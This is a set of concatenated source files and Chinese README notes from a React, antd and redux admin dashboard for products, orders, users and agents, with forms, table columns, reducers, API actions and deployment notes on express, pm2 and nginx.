wrapperCol: {
xs: { span: 24 },
sm: { span: 18 },
},
};
@Form.create()
// Tiered price entry form: three quantity ranges (num1-num2, num3-num4,
// num5-num6) each with a price. Valid values are passed to props.addBatch.
export default class PriceForm extends React.PureComponent {
  handleSubmit = (e) => {
    e.preventDefault();
    this.props.form.validateFields(async(err, values) => {
      if (!err) {
        this.props.addBatch(values)
        // NOTE(review): no initial state is declared on this class, so the
        // `loading` flag set here is never read — confirm before removing.
        this.setState({ loading: false });
        this.handleReset();
      } else {
        this.setState({ loading: false });
      }
    });
  }
  // Keep ranges contiguous: when the upper bound of tier 1 changes, the
  // lower bound of tier 2 becomes value+1 (cleared when input is not numeric,
  // since NaN + 1 is NaN which is falsy).
  handleNum2Change = (e) => {
    const value = e.target.value;
    this.props.form.setFieldsValue({
      num3: parseInt(value, 10) + 1 || undefined,
    });
  }
  // Same as above for tier 2 -> tier 3.
  handleNum4Change = (e) => {
    const value = e.target.value;
    this.props.form.setFieldsValue({
      num5: parseInt(value, 10) + 1 || undefined,
    });
  }
  handleReset = () => {
    this.props.form.resetFields();
  }
  render() {
    const { getFieldDecorator } = this.props.form;
    return (
      <Form onSubmit={this.handleSubmit}>
        <FormItem {...formItemLayout} label="计价单位">
          {getFieldDecorator('unit', {
            initialValue: '0',
            rules: [{
              required: true, message: '请选择计价单位',
            }],
          })(
            <Select>
              {Object.keys(UNIT_VALUES).map(item => (
                <Option key={item} value={item}>{UNIT_VALUES[item]}</Option>
              ))}
            </Select>
          )}
        </FormItem>
        <FormItem required {...formItemLayout} label="产品价格">
          <table className="priceform-table">
            <thead>
              <tr>
                <th>数量</th>
                <th>价格</th>
              </tr>
            </thead>
            <tbody>
              <tr>
                <td>
                  <FormItem style={{ display: 'inline-block' }}>
                    {getFieldDecorator('num1', {
                      initialValue: 1,
                    })(
                      <Input style={{ width: 60 }} />
                    )}
                  </FormItem>
                  <span style={{ padding: '0 15px' }}>至</span>
                  <FormItem style={{ display: 'inline-block' }}>
                    {getFieldDecorator('num2')(
                      <Input style={{ width: 60 }} onChange={this.handleNum2Change} />
                    )}
                  </FormItem>
                </td>
                <td>
                  <FormItem style={{ display: 'inline-block' }}>
                    {getFieldDecorator('price1')(
                      <Input style={{ width: 60 }} />
                    )}
                  </FormItem>
                </td>
              </tr>
              <tr>
                <td>
                  <FormItem style={{ display: 'inline-block' }}>
                    {getFieldDecorator('num3')(
                      <Input style={{ width: 60 }} />
                    )}
                  </FormItem>
                  <span style={{ padding: '0 15px' }}>至</span>
                  <FormItem style={{ display: 'inline-block' }}>
                    {getFieldDecorator('num4')(
                      <Input style={{ width: 60 }} onChange={this.handleNum4Change} />
                    )}
                  </FormItem>
                </td>
                <td>
                  <FormItem style={{ display: 'inline-block' }}>
                    {getFieldDecorator('price2')(
                      <Input style={{ width: 60 }} />
                    )}
                  </FormItem>
                </td>
              </tr>
              <tr>
                <td>
                  <FormItem style={{ display: 'inline-block' }}>
                    {getFieldDecorator('num5')(
                      <Input style={{ width: 60 }} />
                    )}
                  </FormItem>
                  <span style={{ padding: '0 15px' }}>至</span>
                  <FormItem style={{ display: 'inline-block' }}>
                    {getFieldDecorator('num6', {
                      initialValue: 'max',
                    })(
                      <Input style={{ width: 60 }} />
                    )}
                  </FormItem>
                </td>
                <td>
                  <FormItem style={{ display: 'inline-block' }}>
                    {getFieldDecorator('price3')(
                      <Input style={{ width: 60 }} />
                    )}
                  </FormItem>
                </td>
              </tr>
            </tbody>
          </table>
        </FormItem>
        <FormItem {...formItemLayout}>
          <Button style={{ width: '120px', marginRight: '20px' }} type="primary" htmlType="submit">提交</Button>
          <Button onClick={this.handleReset} style={{ width: '120px' }}>清空</Button>
        </FormItem>
      </Form>
    )
  }
}
<file_sep>import React from 'react';
import { Link } from 'react-router-dom';
import { Card, Form, Input, Select, Button, message } from 'antd';
import EnhanceTitle from '../../component/EnhanceTitle';
import Uploader from '../../component/Uploader';
import { addProduct } from '../../action/product';
import { getSystemDicts } from '../../action/system';
import { getProductTypes } from '../../action/productType';
import { formItemLayout2, SUPPLY_STATUS } from '../../utils/constant';
const FormItem = Form.Item;
const Option = Select.Option;
@Form.create()
export default class ProductAdd extends React.PureComponent {
state = {
productCategory: [],
productSubcategory: [],
colour: [],
}
async componentDidMount() {
const productCategory = getSystemDicts({ parentLabel: 'productCategory' });
this.setState({ productCategory: await productCategory });
const colour = getSystemDicts({ parentLabel: 'colour' });
this.setState({ colour: await colour });
}
handleSubmit= (e) => {
e.preventDefault();
this.props.form.validateFields(async (err, values) => {
if (!err) {
const { mainPicture, detailPicture, ...params } = values;
const pic = mainPicture[0];
const detailPic = detailPicture.join(',');
const result = await addProduct({ ...params, mainPicture: pic, detailPicture: detailPic });
if (result && result.code === 0) {
message.success('添加产品成功!,你可以继续添加产品,或者点击返回到列表页面');
} else {
message.error('添加产品失败,请稍后重试!');
}
}
});
}
handleReset = () => {
this.props.form.resetFields();
}
handleCateChange = async (value) => {
this.props.form.setFieldsValue({ productSubcategory: undefined });
if (value) {
const result = await getProductTypes({ parentLabel: value });
this.setState({ productSubcategory: result });
}
}
render() {
const { getFieldDecorator } = this.props.form;
const { productCategory, productSubcategory, colour } = this.state;
return (
<div className="page-detail">
<Form onSubmit={this.handleSubmit}>
<Card bordered={false}>
<EnhanceTitle title="基本信息" />
<FormItem {...formItemLayout2} label="产品名称">
{getFieldDecorator('name', {
rules: [{
required: true, message: '请输入产品名称',
}],
})(
<Input placeholder="请输入产品名称" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品货号">
{getFieldDecorator('sameStyleNum', {
rules: [{
required: true, message: '请输入产品货号',
}],
})(
<Input placeholder="请输入产品货号" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品大类">
{getFieldDecorator('productCategory', {
rules: [{
required: true, message: '请选择产品大类',
}],
})(
<Select onChange={this.handleCateChange} allowClear placeholder="请选择产品大类">
{productCategory.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品子类">
{getFieldDecorator('productSubcategory', {
rules: [{
required: true, message: '请选择产品子类',
}],
})(
<Select placeholder="请选择产品子类">
{productSubcategory.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
<EnhanceTitle title="详情信息" />
<FormItem {...formItemLayout2} label="颜色">
{getFieldDecorator('colour', {
rules: [{
required: true, message: '请选择产品颜色',
}],
})(
<Select allowClear placeholder="请选择产品颜色">
{colour.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品主图">
{getFieldDecorator('mainPicture', {
rules: [{
required: true, message: '请添加产品主图',
}],
})(
<Uploader max={1}/>
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品详情图">
{getFieldDecorator('detailPicture', {
rules: [{
required: true, message: '请添加产品详情图',
}],
})(
<Uploader placeholder="请输入产品名称" max={5} />
)}
</FormItem>
<FormItem {...formItemLayout2} label="成分">
{getFieldDecorator('ingredient', {
rules: [{
required: true, message: '请输入产品成分',
}],
})(
<Input placeholder="请输入产品成分" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="克重">
{getFieldDecorator('weight', {
rules: [{
required: true, message: '请输入产品克重',
}],
})(
<Input placeholder="请输入产品克重" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="门幅">
{getFieldDecorator('size', {
rules: [{
required: true, message: '请输入产品门幅',
}, {
pattern: /^[0-9.]+$/g, message: '请输入数字'
}],
})(
<Input addonAfter="厘米" placeholder="请输入产品门幅" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品用途">
{getFieldDecorator('use', {
rules: [{
required: true, message: '请输入产品用途',
}],
})(
<Input placeholder="请输入产品用途" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="加工工艺">
{getFieldDecorator('craft', {
rules: [{
required: true, message: '请输入产品加工工艺',
}],
})(
<Input placeholder="请输入产品加工工艺" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="供应状态">
{getFieldDecorator('supplyStatus', {
rules: [{
required: true, message: '请选择产品供应状态',
}],
})(
<Select allowClear placeholder="请选择产品供应状态">
{Object.keys(SUPPLY_STATUS).map(item => (
<Option key={item} value={item}>{SUPPLY_STATUS[item]}</Option>
))}
</Select>
)}
</FormItem>
<FormItem {...formItemLayout2} label="发货地点">
{getFieldDecorator('pointOfDeparture', {
rules: [{
required: true, message: '请输入产品发货地点',
}],
})(
<Input placeholder="请输入产品发货地点" />
)}
</FormItem>
</Card>
<div>
<Button style={{ width: '100px', marginRight: '20px' }} type="primary" htmlType="submit">提交</Button>
<Button onClick={this.handleReset} style={{ width: '100px', marginRight: '20px' }}>清空</Button>
<Button style={{ width: '100px' }}>
<Link to="/product/list">返回</Link>
</Button>
</div>
</Form>
</div>
)
}
}
<file_sep>import React from 'react';
import { formatDateSecond, formatYuan } from '../../../utils/utils';
import { nullString, PRODUCT_TYPE, PRODUCT_SUB, PRODUCT_STATUS } from '../../../utils/constant';
// Local code -> display-name lookup for the colour column.
// NOTE(review): hard-coded here while the add-form loads colours from the
// 'colour' dictionary — these two sources can drift; verify.
const color = {
  1: '红色',
  2: '黑色',
  3: '蓝色',
}
// antd Table column config for the product list page.
const columns = [
  {
    title: '产品名称',
    dataIndex: 'name',
    key: 'name',
    align: 'center',
    fixed: 'left',
  },
  {
    title: '产品货号',
    dataIndex: 'sameStyleNum',
    key: 'sameStyleNum',
    align: 'center',
  },
  {
    title: '产品大类',
    dataIndex: 'productCategory',
    key: 'productCategory',
    align: 'center',
    render: (text) => text ? PRODUCT_TYPE[text] : nullString
  },
  {
    title: '产品子类',
    dataIndex: 'productSubcategory',
    key: 'productSubcategory',
    align: 'center',
    render: (text) => text ? PRODUCT_SUB[text] : nullString
  },
  {
    title: '产品图片',
    dataIndex: 'mainPicture',
    key: 'mainPicture',
    align: 'center',
    render: (text) => <img style={{ display: 'block' }} width="50" height="50" src={text} alt="产品图片" />
  },
  {
    // Shows the first tier of the price list, formatted as yuan.
    title: '价格(元)',
    dataIndex: 'productPrice',
    key: 'productPrice',
    align: 'center',
    render: (text, record) => {
      const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
      return formatYuan(product['price']) || nullString
    }
  },
  {
    title: '计价单位',
    dataIndex: 'unit',
    key: 'unit',
    align: 'center',
    render: (text, record) => {
      const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
      return product['unit'] || nullString
    }
  },
  {
    title: '颜色',
    dataIndex: 'colour',
    key: 'colour',
    align: 'center',
    render: (text) => color[text] || nullString
  },
  {
    title: '创建时间',
    dataIndex: 'createTime',
    key: 'createTime',
    align: 'center',
    width: '14%',
    render: (text) => text ? formatDateSecond(text) : nullString
  },
  {
    title: '状态',
    dataIndex: 'status',
    key: 'status',
    align: 'center',
    render: (text) => text ? PRODUCT_STATUS[text] : '待上架'
  },
];
export default columns;
<file_sep>import React from 'react';
// antd Table columns for the line items of one order. Each row carries a
// nested `product` object; monetary fields are stored in cents and divided
// by 100 for display.
const columns = [
  {
    title: '产品图片',
    dataIndex: 'mainPicture',
    key: 'mainPicture',
    align: 'center',
    render: (text, record) => <img width="30" height="30" src={record.product.mainPicture} alt="产品图片" />
  },
  {
    title: '产品名称',
    dataIndex: 'name',
    key: 'name',
    align: 'center',
    render: (text, record) => record.product.name,
  },
  {
    title: '价格(元)',
    dataIndex: 'price',
    key: 'price',
    align: 'center',
    render: text => text / 100,
  },
  {
    title: '计价单位',
    dataIndex: 'unit',
    key: 'unit',
    align: 'center',
    render: (text, record) => record.product.unit,
  },
  {
    title: '颜色',
    dataIndex: 'colour',
    key: 'colour',
    align: 'center',
    render: (text, record) => record.product.colour,
  },
  {
    title: '数量',
    dataIndex: 'quantity',
    key: 'quantity',
    align: 'center',
  },
  {
    // Line subtotal = unit price (cents) * quantity, shown in yuan.
    title: '小计(元)',
    dataIndex: 'total',
    key: 'total',
    align: 'center',
    render: (text, record) => record.price * record.quantity / 100,
  }
];
export default columns;
<file_sep>import { combineReducers } from 'redux';
import auth from './auth';
import user from './user';
import product from './product';
import order from './order';
import agent from './agent';
import skylight from './skylight';
import system from './system';
import productType from './productType';
// Root reducer: one slice per domain module of the admin app.
const rootReducer = combineReducers({
  auth,
  user,
  product,
  order,
  agent,
  skylight,
  system,
  productType,
});
export default rootReducer;
<file_sep>### 搭建react打包后的app.js的后台服务
- `express`启动后台服务
- `connect-history-api-fallback`解决服务启动后页面刷新的404问题
- `http-proxy`解决接口api的代理问题,用`prependPath`解决path的rewrite需求
- `express.static`设置打包后的`build`文件夹作为静态资源库
- `babel-register`解决node兼容es6语法启动问题
### pm2的使用
> pm2是node进程管理工具,可以利用它来简化很多node应用管理的繁琐任务,如性能监控、自动重启、负载均衡等
1. 安装:`npm install -g pm2`利用npm安装pm2包
2. 启动:`pm2 start ./server/index.js --watch`watch参数是express代码发生变化时候,pm2会重启服务
3. 重启:`pm2 reset ./server/index.js`
4. 停止:`pm2 stop all | appid`停止全部或者某个应用
5. 删除:`pm2 delete all | appid`删除全部或某个应用
6. 查看全部应用 `pm2 list`
7. 查看某个进程信息 `pm2 show appid`
8. 环境配置:`--env production`
9. 配置文件:`pm2 init`
10. 日志信息:`pm2 logs`
export NODE_ENV=production && pm2 start ./server/index.js --watch
### nginx配置代理
<file_sep>import { GET_ORDER_LIST, GET_ORDER_BYID } from '../action/order';
// Initial shape of the order slice: paginated list plus the currently
// viewed order detail.
const initialOrderState = {
  orderList: {},
  orderDetail: {},
};

// Order reducer: stores the payloads delivered by the order actions.
export default (state = initialOrderState, action) => {
  if (action.type === GET_ORDER_LIST) {
    return { ...state, orderList: action.data };
  }
  if (action.type === GET_ORDER_BYID) {
    return { ...state, orderDetail: action.data };
  }
  return state;
};
<file_sep>import React from 'react';
import { Input, Form, DatePicker } from 'antd';
import { formItemLayout3 } from '../../utils/constant';
const FormItem = Form.Item;
// Shipping form for an order: express company, tracking number and
// shipping time. Wrapped with Form.create() below, which injects `form`.
class OrderForm extends React.PureComponent {
  constructor(props) {
    super(props);
    // Expose this form instance to the parent (e.g. so a modal's OK
    // handler can call validateFields on it).
    if (props.getCurrent) {
      props.getCurrent(this);
    }
  }
  render() {
    const { getFieldDecorator } = this.props.form;
    return (
      <Form>
        <FormItem {...formItemLayout3} label="快递公司">
          {getFieldDecorator('expressCompanyName', {
            rules: [{
              required: true, message: '请输入快递公司',
            }],
          })(
            <Input placeholder="请输入快递公司" />
          )}
        </FormItem>
        <FormItem {...formItemLayout3} label="快递单号">
          {getFieldDecorator('expressTrackingNo', {
            rules: [{
              required: true, message: '请输入快递单号',
            }],
          })(
            <Input placeholder="请输入快递单号" />
          )}
        </FormItem>
        <FormItem {...formItemLayout3} label="发货时间">
          {getFieldDecorator('shippingTime', {
            rules: [{
              required: true, message: '请选择发货时间',
            }],
          })(
            <DatePicker format="YYYY-MM-DD HH:mm:ss" showTime placeholder="请选择发货时间" />
          )}
        </FormItem>
      </Form>
    )
  }
}
export default Form.create()(OrderForm);
<file_sep>import { IS_DEFAULT, nullString } from '../../../utils/constant';
// antd Table columns for a user's delivery addresses.
const columns = [
  {
    title: '姓名',
    dataIndex: 'consigneeName',
    key: 'consigneeName',
    align: 'center',
  },
  {
    title: '手机号码',
    dataIndex: 'phoneNumber',
    key: 'phoneNumber',
    align: 'center',
  },
  {
    // Full address is composed from city + district + street parts.
    title: '详细地址',
    dataIndex: 'address',
    key: 'address',
    align: 'center',
    render: (text, record) => record.cityName
      ?`${record.cityName}${record.districtName}${record.fullAddress}`
      : nullString
  },
  {
    title: '邮政编码',
    dataIndex: 'zipCode',
    key: 'zipCode',
    align: 'center',
    render: (text) => text || nullString
  },
  {
    // NOTE(review): key 'isDefult' (sic) must match the backend field name —
    // do not rename without checking the API response.
    title: '默认地址',
    dataIndex: 'isDefult',
    key: 'isDefult',
    align: 'center',
    render: (text) => IS_DEFAULT[text]
  },
];
export default columns;
<file_sep>const columns = [
  // antd Table columns for the user login-log page (plain field mapping,
  // no custom renderers).
  {
    title: '用户账号',
    dataIndex: 'account',
    key: 'account',
    align: 'center',
  },
  {
    title: '登录时间',
    dataIndex: 'createTime',
    key: 'createTime',
    align: 'center',
  },
  {
    title: '登录方式',
    dataIndex: 'registChannel',
    key: 'registChannel',
    align: 'center',
  },
  {
    title: 'IP',
    dataIndex: 'remoteAddr',
    key: 'remoteAddr',
    align: 'center',
  },
  {
    title: '地区',
    dataIndex: 'location',
    key: 'location',
    align: 'center',
  },
  {
    title: '操作',
    dataIndex: 'operate',
    key: 'operate',
    align: 'center',
  },
];
export default columns;
<file_sep>import { AUTH_USER_LOGIN, AUTH_USER_EXPIRE, GET_USER_INFO } from '../action/auth';
// Initial auth slice: not authenticated, no profile loaded yet.
const initialAuthState = {
  authStatus: false,
  userInfo: {},
};

// Auth reducer: toggles the login flag on login/expiry and stores the
// fetched user profile.
export default (state = initialAuthState, action) => {
  if (action.type === AUTH_USER_LOGIN) {
    return { ...state, authStatus: true };
  }
  if (action.type === AUTH_USER_EXPIRE) {
    return { ...state, authStatus: false };
  }
  if (action.type === GET_USER_INFO) {
    return { ...state, userInfo: action.data };
  }
  return state;
};
<file_sep>export const nullString = '--';
// Shared antd Form.Item layout presets (label/wrapper column spans used
// across the form pages).
export const formItemLayout = {
  labelCol: {
    xs: { span: 24 },
    sm: { span: 8 }
  },
  wrapperCol: {
    xs: { span: 24 },
    sm: { span: 16 }
  }
};
export const formItemLayout2 = {
  labelCol: {
    xs: { span: 24 },
    sm: { span: 4 },
  },
  wrapperCol: {
    xs: { span: 24 },
    sm: { span: 8 },
  },
};
export const formItemLayout3 = {
  labelCol: {
    xs: { span: 24 },
    sm: { span: 6 },
  },
  wrapperCol: {
    xs: { span: 24 },
    sm: { span: 18 },
  },
};
export const formItemLayout4 = {
  labelCol: {
    xs: { span: 24 },
    sm: { span: 4 },
  },
  wrapperCol: {
    xs: { span: 24 },
    sm: { span: 14 },
  },
};
export const formItemLayout5 = {
  labelCol: {
    xs: { span: 24 },
    sm: { span: 6 },
  },
  wrapperCol: {
    xs: { span: 24 },
    sm: { span: 14 },
  },
};
// antd Pagination `showTotal` callback: renders "共N条数据".
// `range` is supplied by antd but intentionally unused.
export function showTotal(total, range) {
  return '共' + total + '条数据';
}
// Display-name lookup tables for server enum codes, keyed by the raw
// code value coming back from the API.
export const PRODUCT_TYPE = {
  1: '大类一',
  2: '大类二',
  3: '大类三',
}
export const PRODUCT_SUB = {
  1: '子类一',
  2: '子类二',
  3: '子类三',
}
export const PRODUCT_STATUS = {
  0: '待上架',
  1: '上架',
  2: '下架',
}
export const PRODUCT_PRICE_STATUS = {
  0: '未定价',
  1: '已定价',
}
export const SUPPLY_STATUS = {
  0: '无货',
  1: '现货',
  2: '定做',
}
export const UNIT_VALUES = {
  0: '米',
  1: '千克',
}
export const USER_ACCOUNT_STATUS = {
  0: '正常',
  1: '封号',
}
export const REGIST_CHANNEL = {
  0: '公众号',
  1: '小程序',
  2: 'APP',
  3: '网站',
}
export const PAYMENT_METHOD = {
  0: '在线支付',
  1: '货到付款',
  2: '公司转账',
}
export const ORDER_STATUS = {
  0: '待支付',
  1: '待发货',
  2: '已发货',
  3: '已完成',
  4: '已取消',
}
export const ORDER_OPERATE = {
  0: '取消订单',
  1: '订单发货',
  2: '确认收货',
}
export const IS_DEFAULT = {
  0: '否',
  1: '是',
}
export const AGENT_TYPE = {
  0: '门店代理商',
  1: '个人代理商',
}
export const SKY_TYPE = {
  1: 'Banner',
}
export const ORDER_TYPE = {
  'Normal': '正常',
}
export const PAYMENT_CHANNEL = {
  0: '微信Wechat',
  1: '支付宝Alipay',
  2: '银联'
}
export const AGENT_STATUS = {
  0: '正常',
  1: '暂停',
}
<file_sep>import React from 'react';
import { Card, Form, Input, Select, Button } from 'antd';
import EnhanceTitle from '../../component/EnhanceTitle';
const FormItem = Form.Item;
const { Option } = Select;
const { TextArea } = Input;
const formItemLayout = {
labelCol: {
xs: { span: 24 },
sm: { span: 4 },
},
wrapperCol: {
xs: { span: 24 },
sm: { span: 8 },
},
};
@Form.create()
// NOTE(review): despite the name SkylightAdd, every field in this form is an
// agent (代理商) field — the component looks copied from an agent form;
// confirm its intended purpose. Also note the Form submits to
// this.handleSubmit, which is NOT defined on this class, and several
// <Input rows={4}> usages pass a prop that antd Input does not use
// (rows belongs to TextArea) — verify.
export default class SkylightAdd extends React.PureComponent {
  render() {
    const { getFieldDecorator } = this.props.form;
    return (
      <div className="page-detail">
        <Form onSubmit={this.handleSubmit}>
          <Card bordered={false}>
            <EnhanceTitle title="基本信息" />
            <FormItem {...formItemLayout} label="代理商编号">
              {getFieldDecorator('id', {
                rules: [{
                  required: true, message: '请输入代理商编号',
                }],
              })(
                <Input placeholder="请输入代理商编号" />
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="代理商类型">
              {getFieldDecorator('type', {
                rules: [{
                  required: true, message: '请选择代理商类型',
                }],
              })(
                <Select allowClear placeholder="请选择代理商类型">
                  <Option value="Banner">Banner</Option>
                </Select>
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="代理商名称">
              {getFieldDecorator('name', {
                rules: [{
                  required: true, message: '请输入代理商名称',
                }],
              })(
                <Input placeholder="请输入代理商名称" />
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="代理商账号">
              {getFieldDecorator('accountId', {
                rules: [{
                  required: true, message: '请输入代理商账号',
                }],
              })(
                <Input rows={4} placeholder="请输入代理商账号" />
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="返点率">
              {getFieldDecorator('diPer', {
                rules: [{
                  required: true, message: '请输入返点率',
                }],
              })(
                <Input rows={4} placeholder="请输入返点率" />
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="代理商状态">
              {getFieldDecorator('status', {
                rules: [{
                  required: true, message: '请输入代理商状态',
                }],
              })(
                <Input rows={4} placeholder="请输入代理商状态" />
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="门店图片">
              {getFieldDecorator('url', {
                rules: [{
                  required: true, message: '请输入门店图片',
                }],
              })(
                <Input rows={4} placeholder="请输入门店图片" />
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="门店详情">
              {getFieldDecorator('detail', {
                rules: [{
                  required: true, message: '请输入门店详情',
                }],
              })(
                <TextArea rows={4} placeholder="请输入门店详情" />
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="创建时间">
              {getFieldDecorator('createTime', {
                rules: [{
                  required: true, message: '请输入创建时间',
                }],
              })(
                <Input rows={4} placeholder="请输入创建时间" />
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="创建人">
              {getFieldDecorator('creator', {
                rules: [{
                  required: true, message: '请输入创建人',
                }],
              })(
                <Input rows={4} placeholder="请输入创建人" />
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="更新时间">
              {getFieldDecorator('updateTime', {
                rules: [{
                  required: true, message: '请输入更新时间',
                }],
              })(
                <Input rows={4} placeholder="请输入更新时间" />
              )}
            </FormItem>
            <FormItem {...formItemLayout} label="更新人">
              {getFieldDecorator('editer', {
                rules: [{
                  required: true, message: '请输入更新人',
                }],
              })(
                <Input rows={4} placeholder="请输入更新人" />
              )}
            </FormItem>
          </Card>
          <div>
            <Button style={{ width: '120px', marginRight: '20px' }} type="primary" htmlType="submit">提交</Button>
            <Button style={{ width: '120px' }}>清空</Button>
          </div>
        </Form>
      </div>
    )
  }
}
<file_sep>import API from '../utils/api';
import { get, post, put } from '../utils/request';
export const GET_SYSTEM_LOG_LIST = 'GET_SYSTEM_LOG_LIST';
export const GET_SYSTEM_DICT_LIST = 'GET_SYSTEM_DICT_LIST';
// Thunk: fetch the system log list and store it in the system slice.
export function getSystemLogList(params) {
  return async (dispatch) => {
    const result = await get(API.getSystemLogList, params);
    if (result && result.status === 200) {
      dispatch({
        type: GET_SYSTEM_LOG_LIST,
        data: result.data
      });
    } else {
      // FIX: consistent with getSystemDictList below — reset the slice to an
      // empty payload on failure so the UI does not keep showing stale data.
      dispatch({
        type: GET_SYSTEM_LOG_LIST,
        data: {}
      });
    }
  }
}
// Thunk: fetch the paginated dictionary list; on failure resets the slice
// to {} so stale results are not displayed.
export function getSystemDictList(params) {
  return async (dispatch) => {
    const result = await get(API.getSystemDictList, params);
    if (result && result.status === 200) {
      dispatch({
        type: GET_SYSTEM_DICT_LIST,
        data: result.data
      });
    } else {
      dispatch({
        type: GET_SYSTEM_DICT_LIST,
        data: {}
      });
    }
  }
}
// Create a dictionary entry. Resolves to the response body on HTTP 200,
// otherwise resolves to undefined.
export async function postSystemDict(params) {
  const result = await post(API.postSystemDict, params);
  if (result && result.status === 200) {
    return result.data;
  }
}
// Update a dictionary entry. Resolves to the response body on HTTP 200,
// otherwise resolves to undefined.
export async function putSystemDict(params) {
  const result = await put(API.putSystemDict, params);
  if (result && result.status === 200) {
    return result.data;
  }
}
// Fetch one dictionary entry by id; the {id} placeholder in the route
// template is substituted with the given id.
export async function getSystemDictById(id) {
  const result = await get(`${API.getSystemDictById.replace(/{id}/, id)}`);
  if (result && result.status === 200) {
    return result.data
  }
}
export async function getSystemDictByLabel(label) {
const result = await get(`${API.getSystemDictByLabel.replace(/{label}/, label)}`);
if (result && result.status === 200) {
return result.data
}
}
export async function getSystemDicts(params) {
const result = await get(API.getSystemDicts, params);
if (result && result.status === 200) {
return result.data
}
}
<file_sep>## creat-react-server
- [x] creat-react-app
- [x] react-hot-loader
- [x] redux
- [x] redux-thunk
- [x] antd-mobile
- [ ] 服务端渲染
- [x] 接口转发处理
- [ ] jwt使用
- [x] axios
- [x] antd
- [ ] eslint怎么做的
## ANTD真的好大
1. 按需加载之后一个Button组件引入就有500kb
2. 在Main.jsx文件中,竟然从600kb增加到了1300kb
3. 如果只引入login.jsx文件,只有720kb,感觉一个组件要增加100kb左右
4. 必须在nginx服务下开启gzip压缩机制,不然真的很卡
## AuthRoute组件判断是否登录
1. 因为子组件在父组件之前执行,因此引入了`AuthRoute`组件先判断是否登录再加载children组件
## Authorization和后台对接方式
1. auth权限接口设计,每一次接口请求都要在header里添加`Authorization`属性来判断是否有权限,感觉像以前的cookie或者jwt方式登录
2. 如果后台判断没有权限,就会返回401状态,理想中想直接在request中直接push跳转到login页面,但是react-router库在4.0移出了直接使用push方法
3. 目前每次在action中判断是否401,如果是就设置store的isAuth值来跳转路由
## 遇到问题
1. nginx怎么部署
2. 怎么开启gzip服务
## 父组件改变引起子组件改变
1. 父组件发生state或者props改变时,使用继承Component组件,会引起子组件render改变
2. 如果使用继承PureComponent组件,就拥有浅比较,不会引起多余的子组件渲染
### PureComponent浅比较是什么
### localStorage和sessionStorage
localStorage在同一个域名不同标签下是可以共享的,但是不同域名是不可以共享的
sessionStorage在不同标签下是不可以共享的,因此要解决sessionStorage共享问题
https://blog.kazaff.me/2016/09/09/%E8%AF%91-%E5%9C%A8%E5%A4%9A%E4%B8%AA%E6%A0%87%E7%AD%BE%E9%A1%B5%E4%B9%8B%E9%97%B4%E5%85%B1%E4%BA%ABlocalStorage/
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Card, Form, Row, Col, Input, Select, DatePicker, Table, Button } from 'antd';
import logsColumns from './columns/logs';
import { formItemLayout, showTotal } from '../../utils/constant';
import { getUserLoginList } from '../../action/user';
import './index.css'
const FormItem = Form.Item;
const { Option } = Select;
const { RangePicker } = DatePicker;
const dateFormat = 'YYYY/MM/DD';
@connect(({ user }) => ({
userLoginLogs: user.userLoginLogs
}), {
getUserLoginList
})
@Form.create()
export default class UserLogsList extends React.PureComponent {
state = {
pagination: {
showSizeChanger: true,
showQuickJumper: true,
},
loading: false,
};
componentDidMount() {
this.getUserLoginList();
}
getUserLoginList = async (params) => {
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { createTime, ...newParams } = values;
const beginTime = values.createTime ? values.createTime[0].format('YYYY-MM-DD') : undefined;
const endTime = values.createTime ? values.createTime[1].format('YYYY-MM-DD') : undefined;
await this.props.getUserLoginList({ ...newParams, ...params, beginTime, endTime});
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
handleSubmit = (e) => {
e.preventDefault();
this.getUserLoginList();
}
onSelectChange = (selectedRowKeys) => {
this.setState({ selectedRowKeys });
}
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getUserLoginList({
page: pagination.current,
limit: pagination.pageSize,
});
}
handleReset = () => {
this.props.form.resetFields();
};
render() {
const { form: { getFieldDecorator }, userLoginLogs: { records = [], total } } = this.props;
const { pagination, loading } = this.state;
return (
<div className="page-list product-list">
<Card bordered={false} className="form-container">
<Form onSubmit={this.handleSubmit}>
<Row gutter={12}>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="用户账号">
{getFieldDecorator('account')(
<Input placeholder="请输入用户账号" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="登录方式">
{getFieldDecorator('registChannel')(
<Select allowClear placeholder="请选择登录方式">
<Option value="0">公众号</Option>
<Option value="1">小程序</Option>
<Option value="2">APP</Option>
<Option value="3">网站</Option>
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="登录起止时间">
{getFieldDecorator('loginTime')(
<RangePicker format={dateFormat} />
)}
</FormItem>
</Col>
</Row>
<Row>
